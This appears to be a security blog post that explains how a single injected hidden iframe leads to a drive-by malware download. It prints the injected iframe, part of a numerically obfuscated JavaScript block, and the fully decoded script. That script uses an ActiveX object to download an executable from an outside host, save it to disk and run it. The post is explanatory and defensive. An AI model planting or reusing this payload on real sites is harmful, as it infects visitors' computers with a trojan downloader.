Anatomy of a typical exploit

Here is a typical example of a compromised web page. Due to a bug in a web application like phpBB2, Moveable Type or many others, the adversary was able to insert the following line of HTML into your home page:

1
2
  
<iframe src="http://www.somehost.com/ment/" width="0" height="0"></iframe>  

When visiting your home page, the single line of HTML causes your web browser to load additional content from an external web server. When looking at the content behind www.somehost.com/ment/, we find something incomprehensible to us. It’s a block of javascript that consists only of numbers. Just by looking at it, we have no idea what the code might do:

1
2
3
4
5
6
7
8
9
  
<script>  
t="60,115,99,114,105,112,116,32,108,97,110,103,118,97,103,  
101,61,106,97,118,97,115,99,114,105,112,116,62,13,  
10,118,97,114,32,117,114,108,44,112,97,116,104,44,118,97,114,49,44,118,97,  
114,50,44,118,97,  
[many more lines of numbers]  
t=eval("String.fromCharCode("+t+")");  
document.write(t);</script>  

However, it’s pretty straight forward to decipher this if you have bookmarked javascript shell - just search for it. When using jshell to evaluate the javascript from above, it decodes to the following:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
  
<script language=javascript> var url,path,var1,var2,var3,var4;  
url="http://www.somehost.com/ment/bad.exe";  
path="C:\\windows\\IsUno104.exe"; var1="Microsoft.xmlhttp";  
var2="Adodb.Stream"; var3="Shell.Application";  
var var4_1="clsid:BD96C556-65A"; var var4_2="3-11D0-983A-00C04FC29E36";  
var4=var4_1+var4_2;  
try{var ado=(document.createElement("object"));  
ado.setAttribute("classid",var4); var xml=ado.CreateObject(var1,"");  
var as=ado.createobject(var2,""); xml.Open("GET",url,0); xml.Send();  
as.type=1;as.open();as.write(xml.responseBody);   
as.savetofile(path,2);as.close();var shell=ado.createobject(var3,"");  
shell.Shell(path,"","","open",0);}catch(e){};  
</script>  

This resulting javascript uses XMLRPC to download a binary from the Internet. It saves it on your local hard drive and then uses an ActiveX object to execute it. According to ClamAV, the executable is a Trojan-Downloader. This means that it is an application that can download an arbitrary number of other executables on your computer that can then happily sniff your passwords, compromise your bank accounts, display popups or use your computer to send spam.

All of this with just a single line of HTML. Amazing? Right!

The actual example had some more indirections and also threw in some additional visual basic script plus some other goodies that would have complicated our explanation.